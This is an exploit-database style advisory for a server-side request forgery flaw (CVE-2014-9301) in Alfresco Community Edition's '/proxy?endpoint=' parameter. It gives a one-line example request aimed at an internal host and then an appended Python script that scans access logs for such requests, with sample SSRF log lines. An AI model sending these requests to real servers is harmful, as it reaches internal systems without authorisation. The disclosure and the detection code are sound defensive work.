Alfresco - '/proxy?endpoint' Server-Side Request Forgery
Author: V. Paulikas
type: remote
platform: multiple
port:
date_added: 2014-07-16
date_updated: 2016-11-17
verified: 1
codes: CVE-2014-9301;OSVDB-109197
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/68663/info
Alfresco Community Edition is prone to multiple security vulnerabilities.
An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
Alfresco Community Edition 4.2.f and earlier are vulnerable.
http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port
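
A detection check for the request shape shown above, added here as an example and not part of the original advisory: it scans web access logs for requests to the proxy path whose `endpoint` parameter names an internal-looking host. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [16/Jul/2014:10:00:01 +0000] "GET /alfresco/proxy?endpoint=http://10.0.0.5:8080 HTTP/1.1" 200 512',
    '198.51.100.7 - - [16/Jul/2014:10:00:02 +0000] "GET /alfresco/proxy?endpoint=http%3A%2F%2Flocalhost%3A22 HTTP/1.1" 500 0',
    '203.0.113.9 - - [16/Jul/2014:10:00:03 +0000] "GET /alfresco/proxy?endpoint=http://intranet-wiki:8080/ HTTP/1.1" 200 90',
    '203.0.113.9 - - [16/Jul/2014:10:00:04 +0000] "GET /alfresco/faces/jsp/login.jsp HTTP/1.1" 200 4096',
]
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def classify_target(url):
    """Return why an endpoint= target looks internal, or None if it does not."""
    host = urlsplit(url).hostname
    if not host:
        return "unparseable target"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: flag names that only resolve inside the network.
        if host == "localhost" or "." not in host:
            return "single-label or localhost name"
        return None
    if ip.is_private or ip.is_loopback or ip.is_link_local:
        return "non-public IP literal"
    return None

def find_proxy_ssrf(lines):
    """Return (client, endpoint, status, reason) for each suspicious proxy request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/proxy"):
            continue
        # parse_qs percent-decodes, so encoded targets are caught as well.
        for endpoint in parse_qs(parts.query).get("endpoint", []):
            reason = classify_target(endpoint)
            if reason:
                findings.append((client, endpoint, int(status), reason))
    return findings

if __name__ == "__main__":
    print(*find_proxy_ssrf(SAMPLE_LOG), sep="\n")
```

A fully qualified internal DNS name is not flagged by this check; resolving the host and testing the resulting address, or comparing against an allowlist of expected endpoints, closes that gap.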